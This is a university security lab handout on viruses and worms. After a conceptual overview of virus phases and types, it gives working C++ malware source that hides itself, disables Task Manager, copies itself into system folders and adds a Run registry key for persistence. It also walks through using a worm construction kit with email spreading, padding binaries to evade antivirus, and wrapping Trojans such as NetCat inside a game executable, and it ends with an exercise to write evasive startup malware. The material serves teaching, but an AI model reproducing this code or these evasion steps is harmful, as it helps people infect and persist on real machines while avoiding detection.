virus and worms - site.iugaza.edu.pssite.iugaza.edu.ps/hradi/files/lab-14-virus.pdfto know more...

Internet Security ECOM 5347 Lab 14 Viruses & Worms

136

Virus and Worms

Objectives To know more about computer malicious code and how does it works.

Computer Virus:

Briefly we can defined computer virus as a program that inserts

itself into one or more files and then performs some (possibly null)

action.

The first phase, in which the virus inserts itself into a file, is called the

insertion phase. The second phase, in which it performs some action, is

called the execution phase. The following pseudocode fragment shows

how a simple computer virus works.

Beginvirus:

if spread-condition then begin

for some set of target files do begin

if target is not infected then begin

determine where to place virus instructions

copy instructions from beginvirus to endvirus

into target

alter target to execute added instructions

end;

end;

end;

perform some action(s)

goto beginning of infected program

endvirus:

As this code indicates, the insertion phase must be present but need not

always be executed. For example, a virus that infect boot file would

check for an uninfected boot file (the spread-condition mentioned in the

pseudocode) and, if one was found, would infect that file (the set of

target files).

Another description for virus lifetime divides it to four phases:

1. Dormant phase: The virus is idle. The virus will eventually be

activated by some event, such as a date, the presence of another


137

program or file, or the capacity of the disk exceeding some limit.

Not all viruses have this stage.

2. Propagation phase: The virus places an identical copy of itself into

other programs or into certain system areas on the disk. Each

infected program will now contain a clone of the virus, which will

itself enter a propagation phase. Virus propagation requires

human activity such as booting a computer, executing an AutoRun

on a CD, or opening an email attachment.

3. Triggering phase: The virus is activated to perform the function for

which it was intended. As with the dormant phase, the triggering

phase can be caused by a variety of system events, including a

count of the number of times that this copy of the virus has made

copies of itself.

4. Execution phase: The function is performed. The function may be

harmless, such as a message on the screen, or damaging, such as

the destruction of programs and data files.

Types of Viruses

Viruses take many different forms. The following lines introduce

common types and explain how they work. These are the most, but this

isn’t a comprehensive list.

Parasitic virus: The traditional and still most common form of virus. A

parasitic virus attaches itself to executable files and replicates, when the

infected program is executed, by finding other executable files to infect.

Polymorphic virus: A virus that mutates with every infection, making

detection by the "signature" of the virus impossible. This type of viruses

encrypt parts of itself to avoid detection. When the virus does this, it’s

referred to as mutation

Metamorphic virus: As with a polymorphic virus, a metamorphic virus

mutates with every infection. The difference is that a metamorphic virus

rewrites itself completely at each iteration, increasing the difficulty of


138

detection. Metamorphic viruses my change their behavior as well as

their appearance.

Armored virus: an armored virus is designed to make itself difficult to

detect or analyze. Armored viruses cover themselves with protective

code that stops debuggers or disassemblers from examining critical

elements of the virus. The virus may be written in such a way that some

aspects of the programming act as a decoy to distract analysis while the

actual code hides in other areas in the program.

Companion virus: A companion virus attaches itself to legitimate

programs and then creates a program with a different filename

extension. This file may reside in your system’s temporary directory.

When a user types the name of the legitimate program, the companion

virus executes instead of the real program. This effectively hides the

virus from the user. Many of the viruses that are used to attack

Windows systems make changes to program pointers in the Registry so

that they point to the infected program. The infected program may

perform its dirty deed and then start the real program.

Multipartite virus: A multipartite virus attacks your system in multiple

ways. It may attempt to infect your boot sector, infect all of your

executable files, and destroy your application files. The hope here is that

you won’t be able to correct all the problems and will allow the

infestation to continue. The multipartite virus in Figure 2.17 attacks your

boot sector, infects application files, and attacks your Microsoft Word

documents.

Figure 1 Multipartite Virus


139

Retrovirus: A retrovirus attacks or bypasses the antivirus software

installed on a computer. You can consider a retrovirus to be an anti-

antivirus. Retroviruses can directly attack your antivirus software and

potentially destroy the virus definition database file. Destroying this

information without your knowledge would leave you with a false sense

of security. The virus may also directly attack an antivirus program to

create bypasses for itself.

Stealth virus: A stealth virus attempts to avoid detection by masking

itself from applications. It may attach itself to the boot sector of the

hard drive. When a system utility or program runs, the stealth virus

redirects commands around itself in order to avoid detection. An

infected file may report a file size different from what is actually present

in order to avoid detection. Figure 2.19 shows a stealth virus attaching

itself to the boot sector to avoid detection. Stealth viruses may also

move themselves from fileA to fileB during a virus scan for the same

reason.

Figure 2 Stealth Virus

Phage virus: a phage virus modifies and alters other programs and

databases. The virus infects all of these files. The only way to remove

this virus is to reinstall the programs that are infected. If you miss even a

single incident of this virus on the victim system, the process will start

again and infect the system once more.

Worms

A worm is a program that can replicate itself and send copies from

computer to computer across network connections. Upon arrival, the

worm may be activated to replicate and propagate again. In addition to

propagation, the worm usually performs some unwanted function. Early

worms filled up memory and bred inside the RAM of the target


140

computer. Worms can use TCP/IP, e-mail, Internet services, sharing

folders or any number of means to each of their target

A worm is different from a virus in that it can reproduce itself, it’s self-

contained , and it doesn’t need a host application to be transported.

Many of the so-called viruses that have made the papers and media

were, in actuality, worms and not viruses. However, it’s possible for a

worm to contain or deliver a virus to a target system.

Logic Bomb

The logic bomb is code embedded in some legitimate program that is set

to "explode" when certain conditions are met and performs an action

that violates the security policy. Examples of conditions that can be used

as triggers for a logic bomb are the presence or absence of certain files,

a particular day of the week or date, or a particular user running the

application. Once triggered, a bomb may alter or delete data or entire

files, cause a machine halt, or do some other damage.

Example:

In the attack depicted in Figure 2.20, the logic bomb sends a message

back to the attacking system that it has loaded successfully. The victim

system can then be used to initiate an attack such as a DDoS attack, or it

can grant access at the time of the attacker’s choosing.

Figure 3


141

Bacteria, or rabbit programs, make copies of themselves to

overwhelm a computer system's resources. Bacteria do not explicitly

damage any files. Their sole purpose is to replicate themselves. A typical

bacteria program may do nothing more than execute two copies of itself

simultaneously on multiprogramming systems, or perhaps create two

new files, each of which is a copy of the original source file of the

bacteria program. Both of those programs then may copy themselves

twice, and so on. Bacteria reproduce exponentially, eventually taking up

all the processor capacity, memory, or disk space, denying the user

access to those resources.

Antivirus Approaches

The ideal solution to the threat of viruses is prevention: Do not allow a

virus to get into the system in the first place. This goal is, in general,

impossible to achieve, although prevention can reduce the number of

successful viral attacks. The next best approach is to be able to do the

following:

Detection: Once the infection has occurred, determine that it has

occurred and locate the virus.

Identification: Once detection has been achieved, identify the

specific virus that has infected a program.

Removal: Once the specific virus has been identified, remove all

traces of the virus from the infected program and restore it to its

original state. Remove the virus from all infected systems so that

the disease cannot spread further.


142

Lab Experiment Requirements:

We need only one machine in this experiment to built our malicious code and

run it.

Procedures :

Part 1 : Writing your virus (Using C++):

Code #include <windows.h>

#include <iostream>

using namespace std;

int main ( )

{

//----------------1--------------------

AllocConsole();

ShowWindow (FindWindowA("ConsoleWindowClass",NULL),0);

//----------------2--------------------

HKEY hKey;

unsigned char reg[2] = "1";

RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Policies\\system",&hKey);

RegSetValueEx(hKey,"disabletaskmgr",0,REG_DWORD,reg,sizeof(reg

));

RegCloseKey(hKey);

//------------------3------------------

char windir[MAX_PATH];

HKEY hKey2;

char pathname[256];

GetWindowsDirectory(windir, sizeof(windir));

HMODULE gMh = GetModuleHandle(0);

GetModuleFileName(gMh, pathname, 256);

strcat(windir, "\\system32\\code.exe");

CopyFile(pathname,windir,0);

unsigned char omg[45] = windir+"";

if(RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersi

on\\Run",0,KEY_SET_VALUE,&hKey2 )==EXIT_SUCCESS)

{

RegSetValueEx(hKey2,

"Code",0,REG_SZ,omg,sizeof(omg));

RegCloseKey(hKey2);

}

else

{

RegOpenKeyEx(

HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersio

n\\Run",0,KEY_SET_VALUE,&hKey2 );


143

RegSetValueEx(hKey2,

"Code",0,REG_SZ,omg,sizeof(omg));

RegCloseKey(hKey2);

}

//------------------4------------------

char path[MAX_PATH];

HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH, path, 255);

CopyFile(path,"C:\\code.exe",FALSE);

system("pause");

return 0;

}

For the above code : (each number below is corresponding to number in comment in

code):

1- This code hide the resultant virus window that must be displayed when you

run any application normally.

2- This part of code create a new registry key named disabletaskmgr in the path

SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system in

HKEY_CURRENT_USER to disable task manager (ctrl+alt+delete) , we assign

value 1 to new registry key.

Method RegCreateKey create new key and RegSetValueEx set the value for

the specified key.

3- In this part we copy our malicious code to a path so that it can be run at

startup; For the code below we get path of windows folder using

GetWindowsDirectory method , we obtain module handle name by

GetModuleFileName and copy it to system32 folder in windows directory by

CopyFile method ; then we create a registry key in

Software\\Microsoft\\Windows\\CurrentVersion\\Run to run this

code when the computer starts or logon.

4- Last part of code , we use to copy our code in different paths so that it is

difficult to erase ,this part to spread your virus code you can add more

CopyFile statement.

Part 2: Hiding Viruses


144

Virus construction Kit :

- After running the construction kit, specify the name of your worm before you shift to other options .The main interface of this kit is shown in figure 4, figure 5 also display backup options where path and registry key will this worm reside.

Figure 4

Figure 5

- If you want to spread your worm via outlook (if your victim use outlook) ; you can determine a message title and body; you can configure from Outlook Options the same thing you can configure other spreading options such P2P.


145

- Now choose the action you want to perform from the list that included in

Payload Options; let us choose Run File/Link and type www.iugaza.edu.ps, payload options available by this tool is listed in figure 6.

Figure 6

- The last thing is determine when your action will tack place form Payload Trigger Options figure 7; you can choose on execution as an example; then click construct worm.

Figure 7

- When you run the resultant worm the result as the figure 8.

http://www.iugaza.edu.ps/


146

Figure 8

Stealth Tools : We can use this tool to hide viruses and malwares also Trojans from antivirus

software. - First of all determine the file you want to use as virus . - Add Bytes : it is add white bytes = NOP instruction ; it is useful to throwing

off antivirus software ; figure 9 shows the interface of this tool and simple configuration of add bytes option. Test the file size before and after adding NOP operation? Open the produced file using any text editor and see NOP operation.


147

Figure 9

- Another method to hide your malicious code is binding file with another executable file to create single executable file as shown in figure 10.

Figure 10


148

Eliterwrap Tool: Another tool we can use to hide executable files is eliterwrap ; this tool allow

you to hide executable file (malicious code : Trojan or virus) in legal one as solitaire

game as example.

By this tool we can embed tool such NetCat (refer to NetCat lab) and we specify the

command to execute when running the file in Enter command line step, with

another executable file.

Figure 11 shows hiding Trojan named patch with solitaire spider to produce

executable file named play.exe.

Figure 11

Exercise: Write a virus code in c++ to disable regedit and run on startup ; hide your

code in any method . In your opinion what is the effective way to hide the

code to be away of antivirus discovery.

virus and worms - site.iugaza.edu.pssite.iugaza.edu.ps/hradi/files/lab-14-virus.pdfto know more...

Documents